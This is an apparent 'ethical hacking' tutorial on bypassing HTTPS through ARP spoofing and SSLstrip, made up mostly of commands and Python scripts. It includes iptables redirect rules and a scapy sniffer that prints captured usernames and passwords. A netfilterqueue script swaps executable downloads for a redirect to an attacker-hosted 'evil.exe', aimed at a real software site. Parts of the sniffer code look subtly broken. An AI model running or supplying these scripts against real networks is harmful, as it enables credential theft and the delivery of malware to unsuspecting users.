Python Ethical Hacking - Bypass HTTPS(1)

HTTPS:

Problem:

• Data in HTTP is sent as plain text.
• A MITM can read and edit requests and responses.

-> not secure

Solution:

• Use HTTPS.
• HTTPS is an adaptation of HTTP.
• Encrypt HTTP using TLS(Transport Layer Security) or SSL(Secure Sockets Layer).

ARP Spoofing

 

 ARP Spoofing With SSLStrip

 1. Flush route tables and execute the arp_spoof script.

iptables --flush
python3 arp_spoof.py

2. Start the SSLstrip.

sslstrip

3. Execute the following commands to redirect the packets.

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

4. Run the sniff script.

#!/usr/bin/env python

import scapy
from scapy.layers.http import HTTPRequest
from scapy.packet import Raw
from scapy.sendrecv import sniff


def sniff(interface):
    scapy.sendrecv.sniff(iface=interface, store=False, prn=process_sniffed_packet)


def get_url(packet):
    return packet[HTTPRequest].Host.decode(errors='ignore') + packet[HTTPRequest].Path.decode(errors='ignore')


def get_login_info(packet):
    if packet.haslayer(Raw):
        packet.show()
        load = packet[Raw].load
        keywords = ["email", "username", "user", "login", "password", "pass", "uid"]
        for keyword in keywords:
            if keyword in load:
                return load


def process_sniffed_packet(packet):
    if packet.haslayer(HTTPRequest):
        url = get_url(packet)
        print("[+] HTTP Request >> " + url)

        login_info = get_login_info(packet)
        if login_info:
            print("\n\n[+] Possible username/password > " + login_info + "\n\n")
        scapy.sendrecv.sniff()


sniff("eth0")

5. Browse the target website and find something interesting.

 

Replacing Downloads on HTTPS Pages:

1.Execute the following commands

iptables --flush

iptables -I OUTPUT -j NFQUEUE --queue-num 0

iptables -I INPUT -j NFQUEUE --queue-num 0

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

echo 1 > /proc/sys/net/ipv4/ip_forward

python3 arp_spoof.py

 2. Modify the Python Script and execute

#!/usr/bin/env python

from netfilterqueue import NetfilterQueue
from scapy.layers.inet import IP, TCP
from scapy.packet import Raw

ack_list = []


def set_load(packet, load):
    packet[Raw].load = load
    del packet[IP].len
    del packet[IP].chksum
    del packet[TCP].chksum
    return packet


def process_packet(packet):
    scapy_packet = IP(packet.get_payload())
    if scapy_packet.haslayer(Raw) and scapy_packet.haslayer(TCP):
        if scapy_packet[TCP].dport == 10000:
            if ".exe" in scapy_packet[Raw].load.decode() and "10.0.0.43" not in scapy_packet[Raw].load.decode():
                print("[+]EXE Request")
                ack_list.append(scapy_packet[TCP].ack)
        elif scapy_packet[TCP].sport == 10000:
            if scapy_packet[TCP].seq in ack_list:
                ack_list.remove(scapy_packet[TCP].seq)
                print("[+] Replacing file")
                modified_packet = set_load(scapy_packet, "HTTP/1.1 301 Moved Permanently\nLocation: http://10.0.0.43/evil-files/evil.exe\n\n")
                packet.set_payload(str(modified_packet).encode())

    packet.accept()


queue = NetfilterQueue()
queue.bind(0, process_packet)
try:
    queue.run()
except KeyboardInterrupt:
    print('')

3. Browse the website - https://winzip.com and try to download the executable file.